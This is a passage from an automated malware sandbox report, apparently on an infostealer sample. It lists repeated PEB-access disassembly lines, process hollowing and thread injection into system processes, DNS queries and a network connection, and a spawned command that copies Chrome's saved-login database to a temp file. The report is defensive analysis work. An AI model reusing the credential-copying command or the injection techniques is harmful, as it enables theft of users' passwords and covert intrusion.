Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]	10_2_00BB2AE4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2ACB mov eax, dword ptr fs:[00000030h]	10_2_00BB2ACB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC4A2C mov eax, dword ptr fs:[00000030h]	10_2_00BC4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC4A2C mov eax, dword ptr fs:[00000030h]	10_2_00BC4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4EA55 mov eax, dword ptr fs:[00000030h]	10_2_00C4EA55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C14257 mov eax, dword ptr fs:[00000030h]	10_2_00C14257
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3B260 mov eax, dword ptr fs:[00000030h]	10_2_00C3B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3B260 mov eax, dword ptr fs:[00000030h]	10_2_00C3B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA3A1C mov eax, dword ptr fs:[00000030h]	10_2_00BA3A1C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58A62 mov eax, dword ptr fs:[00000030h]	10_2_00C58A62
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov eax, dword ptr fs:[00000030h]	10_2_00B85210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov ecx, dword ptr fs:[00000030h]	10_2_00B85210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov eax, dword ptr fs:[00000030h]	10_2_00B85210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov eax, dword ptr fs:[00000030h]	10_2_00B85210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8AA16 mov eax, dword ptr fs:[00000030h]	10_2_00B8AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8AA16 mov eax, dword ptr fs:[00000030h]	10_2_00B8AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B98A0A mov eax, dword ptr fs:[00000030h]	10_2_00B98A0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC927A mov eax, dword ptr fs:[00000030h]	10_2_00BC927A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AA16 mov eax, dword ptr fs:[00000030h]	10_2_00C4AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AA16 mov eax, dword ptr fs:[00000030h]	10_2_00C4AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]	10_2_00B89240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]	10_2_00B89240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]	10_2_00B89240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]	10_2_00B89240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C053CA mov eax, dword ptr fs:[00000030h]	10_2_00C053CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C053CA mov eax, dword ptr fs:[00000030h]	10_2_00C053CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	10_2_00BB4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	10_2_00BB4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	10_2_00BB4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBB390 mov eax, dword ptr fs:[00000030h]	10_2_00BBB390
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2397 mov eax, dword ptr fs:[00000030h]	10_2_00BB2397
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B91B8F mov eax, dword ptr fs:[00000030h]	10_2_00B91B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B91B8F mov eax, dword ptr fs:[00000030h]	10_2_00B91B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3D380 mov ecx, dword ptr fs:[00000030h]	10_2_00C3D380
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4138A mov eax, dword ptr fs:[00000030h]	10_2_00C4138A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BADBE9 mov eax, dword ptr fs:[00000030h]	10_2_00BADBE9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	10_2_00BB03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	10_2_00BB03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	10_2_00BB03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	10_2_00BB03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	10_2_00BB03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	10_2_00BB03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C55BA5 mov eax, dword ptr fs:[00000030h]	10_2_00C55BA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58B58 mov eax, dword ptr fs:[00000030h]	10_2_00C58B58
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB3B7A mov eax, dword ptr fs:[00000030h]	10_2_00BB3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB3B7A mov eax, dword ptr fs:[00000030h]	10_2_00BB3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]	10_2_00B8DB60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4131B mov eax, dword ptr fs:[00000030h]	10_2_00C4131B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8F358 mov eax, dword ptr fs:[00000030h]	10_2_00B8F358
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8DB40 mov eax, dword ptr fs:[00000030h]	10_2_00B8DB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58CD6 mov eax, dword ptr fs:[00000030h]	10_2_00C58CD6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9849B mov eax, dword ptr fs:[00000030h]	10_2_00B9849B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	10_2_00C06CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	10_2_00C06CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	10_2_00C06CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C414FB mov eax, dword ptr fs:[00000030h]	10_2_00C414FB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1C450 mov eax, dword ptr fs:[00000030h]	10_2_00C1C450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1C450 mov eax, dword ptr fs:[00000030h]	10_2_00C1C450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBBC2C mov eax, dword ptr fs:[00000030h]	10_2_00BBBC2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]	10_2_00C41C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C5740D mov eax, dword ptr fs:[00000030h]	10_2_00C5740D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C5740D mov eax, dword ptr fs:[00000030h]	10_2_00C5740D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C5740D mov eax, dword ptr fs:[00000030h]	10_2_00C5740D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]	10_2_00C06C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]	10_2_00C06C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]	10_2_00C06C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]	10_2_00C06C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA746D mov eax, dword ptr fs:[00000030h]	10_2_00BA746D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA44B mov eax, dword ptr fs:[00000030h]	10_2_00BBA44B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	10_2_00C06DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	10_2_00C06DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	10_2_00C06DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]	10_2_00C06DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	10_2_00C06DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	10_2_00C06DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	10_2_00BB1DB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	10_2_00BB1DB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	10_2_00BB1DB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB35A1 mov eax, dword ptr fs:[00000030h]	10_2_00BB35A1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBFD9B mov eax, dword ptr fs:[00000030h]	10_2_00BBFD9B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBFD9B mov eax, dword ptr fs:[00000030h]	10_2_00BBFD9B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]	10_2_00C4FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]	10_2_00C4FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]	10_2_00C4FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]	10_2_00C4FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C38DF1 mov eax, dword ptr fs:[00000030h]	10_2_00C38DF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]	10_2_00B82D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]	10_2_00B82D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]	10_2_00B82D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]	10_2_00B82D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]	10_2_00B82D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]	10_2_00BB2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]	10_2_00BB2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]	10_2_00BB2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]	10_2_00BB2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]	10_2_00B9D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]	10_2_00B9D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C505AC mov eax, dword ptr fs:[00000030h]	10_2_00C505AC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C505AC mov eax, dword ptr fs:[00000030h]	10_2_00C505AC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4D3B mov eax, dword ptr fs:[00000030h]	10_2_00BB4D3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4D3B mov eax, dword ptr fs:[00000030h]	10_2_00BB4D3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4D3B mov eax, dword ptr fs:[00000030h]	10_2_00BB4D3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C03540 mov eax, dword ptr fs:[00000030h]	10_2_00C03540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8AD30 mov eax, dword ptr fs:[00000030h]	10_2_00B8AD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]	10_2_00B93D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAC577 mov eax, dword ptr fs:[00000030h]	10_2_00BAC577
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAC577 mov eax, dword ptr fs:[00000030h]	10_2_00BAC577
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA7D50 mov eax, dword ptr fs:[00000030h]	10_2_00BA7D50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58D34 mov eax, dword ptr fs:[00000030h]	10_2_00C58D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C0A537 mov eax, dword ptr fs:[00000030h]	10_2_00C0A537
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4E539 mov eax, dword ptr fs:[00000030h]	10_2_00C4E539
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC3D43 mov eax, dword ptr fs:[00000030h]	10_2_00BC3D43
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3FEC0 mov eax, dword ptr fs:[00000030h]	10_2_00C3FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58ED6 mov eax, dword ptr fs:[00000030h]	10_2_00C58ED6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1FE87 mov eax, dword ptr fs:[00000030h]	10_2_00C1FE87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB16E0 mov ecx, dword ptr fs:[00000030h]	10_2_00BB16E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B976E2 mov eax, dword ptr fs:[00000030h]	10_2_00B976E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C50EA5 mov eax, dword ptr fs:[00000030h]	10_2_00C50EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C50EA5 mov eax, dword ptr fs:[00000030h]	10_2_00C50EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C50EA5 mov eax, dword ptr fs:[00000030h]	10_2_00C50EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C046A7 mov eax, dword ptr fs:[00000030h]	10_2_00C046A7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB36CC mov eax, dword ptr fs:[00000030h]	10_2_00BB36CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC8EC7 mov eax, dword ptr fs:[00000030h]	10_2_00BC8EC7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AE44 mov eax, dword ptr fs:[00000030h]	10_2_00C4AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AE44 mov eax, dword ptr fs:[00000030h]	10_2_00C4AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8E620 mov eax, dword ptr fs:[00000030h]	10_2_00B8E620
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA61C mov eax, dword ptr fs:[00000030h]	10_2_00BBA61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA61C mov eax, dword ptr fs:[00000030h]	10_2_00BBA61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C600 mov eax, dword ptr fs:[00000030h]	10_2_00B8C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C600 mov eax, dword ptr fs:[00000030h]	10_2_00B8C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C600 mov eax, dword ptr fs:[00000030h]	10_2_00B8C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB8E00 mov eax, dword ptr fs:[00000030h]	10_2_00BB8E00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]	10_2_00BAAE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]	10_2_00BAAE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]	10_2_00BAAE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]	10_2_00BAAE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]	10_2_00BAAE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41608 mov eax, dword ptr fs:[00000030h]	10_2_00C41608
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9766D mov eax, dword ptr fs:[00000030h]	10_2_00B9766D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]	10_2_00B97E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]	10_2_00B97E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]	10_2_00B97E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]	10_2_00B97E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]	10_2_00B97E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]	10_2_00B97E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3FE3F mov eax, dword ptr fs:[00000030h]	10_2_00C3FE3F

Source: C:\Windows\SysWOW64\secinit.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe

Code function: 21_2_00F11C41 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

21_2_00F11C41

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: vp21b7dsh.exe.3.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.589man.com
Source: C:\Windows\explorer.exe	Network Connect: 199.192.24.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.joomlas123.info

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 10410000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 2DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 2DE0000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 2DE0000

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Memory written: C:\Windows\SysWOW64\secinit.exe base: 10410000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\secinit.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\secinit.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\SysWOW64\secinit.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1090000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 10410000	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 2DD0000	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 2DE0000	Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\secinit.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior

Source: explorer.exe, 00000003.00000002.920574609.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.713034911.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe

